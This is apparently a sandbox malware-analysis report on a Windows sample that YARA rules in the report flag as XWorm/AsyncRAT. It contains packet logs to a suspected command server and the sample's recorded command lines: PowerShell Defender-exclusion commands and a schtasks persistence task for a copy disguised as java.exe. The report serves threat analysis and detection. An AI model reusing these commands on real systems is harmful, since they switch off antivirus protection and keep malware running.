                                                                                Nov 29, 2024 15:21:01.147908926 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:01.147964001 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:01.267997026 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:01.268066883 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:01.388170004 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:01.390386105 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:01.455982924 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:01.507535934 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:01.510443926 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:01.512110949 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:01.632103920 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:01.724010944 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:01.844403982 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:01.923265934 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:02.005191088 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:02.043426037 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:02.125490904 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:02.125543118 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:02.125610113 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:02.125623941 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:02.246597052 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:02.246666908 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:02.366655111 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:02.366714954 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:02.486670017 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:02.486727953 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:02.608516932 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:02.608571053 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:02.728506088 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:02.728571892 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:02.848645926 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:02.848702908 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:02.899454117 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:02.960680008 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:02.967999935 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:02.975847960 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.088387012 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.088481903 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.088530064 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:03.088536978 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.088587999 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.088617086 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.208667994 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.208750963 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:03.328819036 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.329282045 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:03.449405909 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.449995995 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:03.570470095 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.573359966 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:03.693439960 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.693634987 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:03.762113094 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.800132036 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:03.814054012 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.814591885 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:03.920368910 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.920445919 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.920478106 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:03.920527935 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.920538902 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.920561075 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.920671940 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:03.934688091 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:04.040694952 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:04.040774107 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:04.160742998 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:04.162283897 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:04.282219887 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:04.290200949 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:04.410254955 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:04.423652887 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:04.426019907 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:04.582052946 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:04.592772961 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:04.596157074 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:04.702876091 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:04.702888012 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:04.702897072 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:04.702907085 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:04.717683077 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:04.720026016 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:04.840092897 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:05.030144930 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:05.150141954 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:05.150188923 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:05.203906059 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:05.251380920 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:05.270164013 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:05.270210981 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:05.372246027 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:05.372291088 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:05.372441053 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:05.372539997 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:05.492114067 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:05.492172956 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:05.732671022 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:05.732784033 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:05.732788086 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:05.854098082 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:05.854165077 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:05.975438118 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:05.975522041 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:06.029169083 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.029419899 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:06.077856064 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:06.095606089 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.149518013 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.149595976 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:06.198087931 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.198103905 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.198127985 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.198196888 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.198249102 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.198292971 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.198347092 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.198421001 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.198457956 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.198661089 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.269598007 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.269660950 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:06.389714003 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.389847994 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:06.510056019 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.510253906 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:06.630423069 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.630516052 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:06.712577105 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.712688923 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:06.750128984 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:06.750639915 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.832664967 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.832827091 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:06.870301008 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.870404959 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.870655060 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.870663881 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.870671988 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.870680094 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.870692015 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.870745897 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.870817900 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.870896101 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.870975018 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.952828884 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:06.952908993 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:07.073160887 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:07.073226929 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:07.193341017 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:07.193394899 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:07.313668013 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:07.313716888 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:07.420403957 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:07.420598984 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:07.433712006 CET700049986103.230.121.124192.168.2.6
                                                                                Nov 29, 2024 15:21:07.471556902 CET499867000192.168.2.6103.230.121.124
                                                                                Nov 29, 2024 15:21:07.540863991 CET700049986103.230.121.124192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2024 15:19:00.840665102 CET | 59255 | 53 | 192.168.2.6 | 1.1.1.1
Nov 29, 2024 15:19:00.978753090 CET | 53 | 59255 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 29, 2024 15:19:00.840665102 CET | 192.168.2.6 | 1.1.1.1 | 0x5bc1 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 29, 2024 15:19:00.978753090 CET | 1.1.1.1 | 192.168.2.6 | 0x5bc1 | No error (0) | ip-api.com | - | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:19:29.317481041 CET | 1.1.1.1 | 192.168.2.6 | 0x8159 | No error (0) | g-bing-com.ax-0001.ax-msedge.net | ax-0001.ax-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 29, 2024 15:19:29.317481041 CET | 1.1.1.1 | 192.168.2.6 | 0x8159 | No error (0) | ax-0001.ax-msedge.net | - | 150.171.28.10 | A (IP address) | IN (0x0001) | false
Nov 29, 2024 15:19:29.317481041 CET | 1.1.1.1 | 192.168.2.6 | 0x8159 | No error (0) | ax-0001.ax-msedge.net | - | 150.171.27.10 | A (IP address) | IN (0x0001) | false
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49712 | 208.95.112.1 | 80 | 2968 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 15:19:01.105918884 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
Nov 29, 2024 15:19:02.302964926 CET | 175 | IN | HTTP/1.1 200 OK
    Date: Fri, 29 Nov 2024 14:19:01 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 6
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
    Data Raw: 66 61 6c 73 65 0a
    Data Ascii: false


                                                                                Target ID:0
                                                                                Start time:09:18:59
                                                                                Start date:29/11/2024
                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                Imagebase:0x630000
                                                                                File size:89'088 bytes
                                                                                MD5 hash:4347FB3A5B1EABF2E594A895A30B98F4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3408817500.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2125481379.0000000000632000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2125481379.0000000000632000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3414135593.00000000129A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3414135593.00000000129A1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3408817500.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Target ID:2
                                                                                Start time:09:19:01
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:09:19:01
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:6
                                                                                Start time:09:19:09
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:09:19:09
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:10
                                                                                Start time:09:19:25
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\java.exe'
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:11
                                                                                Start time:09:19:25
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:12
                                                                                Start time:09:19:28
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                Imagebase:0x7ff7403e0000
                                                                                File size:55'320 bytes
                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:16
                                                                                Start time:09:19:44
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'java.exe'
                                                                                Imagebase:0x7ff6e3d50000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:17
                                                                                Start time:09:19:44
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:18
                                                                                Start time:09:20:08
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe"
                                                                                Imagebase:0x7ff79f0f0000
                                                                                File size:235'008 bytes
                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:19
                                                                                Start time:09:20:08
                                                                                Start date:29/11/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff66e660000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:20
                                                                                Start time:09:20:09
                                                                                Start date:29/11/2024
                                                                                Path:C:\Users\user\AppData\Roaming\java.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Users\user\AppData\Roaming\java.exe
                                                                                Imagebase:0x300000
                                                                                File size:89'088 bytes
                                                                                MD5 hash:4347FB3A5B1EABF2E594A895A30B98F4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\java.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\java.exe, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\java.exe, Author: ditekSHen
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 82%, ReversingLabs
                                                                                Has exited:true

                                                                                Target ID:21
                                                                                Start time:09:20:18
                                                                                Start date:29/11/2024
                                                                                Path:C:\Users\user\AppData\Roaming\java.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\AppData\Roaming\java.exe"
                                                                                Imagebase:0x7ff642ec0000
                                                                                File size:89'088 bytes
                                                                                MD5 hash:4347FB3A5B1EABF2E594A895A30B98F4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:22
                                                                                Start time:09:20:26
                                                                                Start date:29/11/2024
                                                                                Path:C:\Users\user\AppData\Roaming\java.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\AppData\Roaming\java.exe"
                                                                                Imagebase:0x100000
                                                                                File size:89'088 bytes
                                                                                MD5 hash:4347FB3A5B1EABF2E594A895A30B98F4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:23
                                                                                Start time:09:21:01
                                                                                Start date:29/11/2024
                                                                                Path:C:\Users\user\AppData\Roaming\java.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Users\user\AppData\Roaming\java.exe
                                                                                Imagebase:0x700000
                                                                                File size:89'088 bytes
                                                                                MD5 hash:4347FB3A5B1EABF2E594A895A30B98F4
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true


                                                                                  Execution Graph

                                                                                  Execution Coverage:25.5%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:33.3%
                                                                                  Total number of Nodes:9
                                                                                  Total number of Limit Nodes:0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  [Control-flow graph image; entry block 7ffd34819469-7ffd348194fd, with calls to 7ffd34818f40, 7ffd34810388, 7ffd348180d8, 7ffd34810398, 7ffd34818358, 7ffd34810378 and 7ffd34810358]
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: B
                                                                                  • API String ID: 0-1255198513
                                                                                  • Opcode ID: d18337cae9e8d5ba4eb8018ab51105cb8786643cf2ed1739a02278c2ab9fd0f7
                                                                                  • Instruction ID: 4a6b8359cfe3999513ea99930a7c1aca65e6c2ce3faf9230943587b28e6e156a
                                                                                  • Opcode Fuzzy Hash: d18337cae9e8d5ba4eb8018ab51105cb8786643cf2ed1739a02278c2ab9fd0f7
                                                                                  • Instruction Fuzzy Hash: 48624170B18A098FEB58EF68C4A57B9B7E2FF99314F144579D04ED3291DE38A881CB41

                                                                                  Control-flow Graph

                                                                                  [Control-flow graph image; entry block 7ffd3481f6a0-7ffd34823bda, with calls to 7ffd3481f6b8, 7ffd3481f7b0 and 7ffd3481cd90]
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: K_H
                                                                                  • API String ID: 0-313846638
                                                                                  • Opcode ID: d74b08c3683e68942522e5d248b9b932d4f21b04f03990ae3afec17f6ae95343
                                                                                  • Instruction ID: 13a396fc1a64649e6e466ef0e9bbdf2e6e0078ea5b467c9cb60e46a5d1a3b598
                                                                                  • Opcode Fuzzy Hash: d74b08c3683e68942522e5d248b9b932d4f21b04f03990ae3afec17f6ae95343
                                                                                  • Instruction Fuzzy Hash: E9F13070A199198FDB98EB6CD8A5BB8B7F1FB59310F1041B9D44DE3291DF38A981CB40

                                                                                  Control-flow Graph

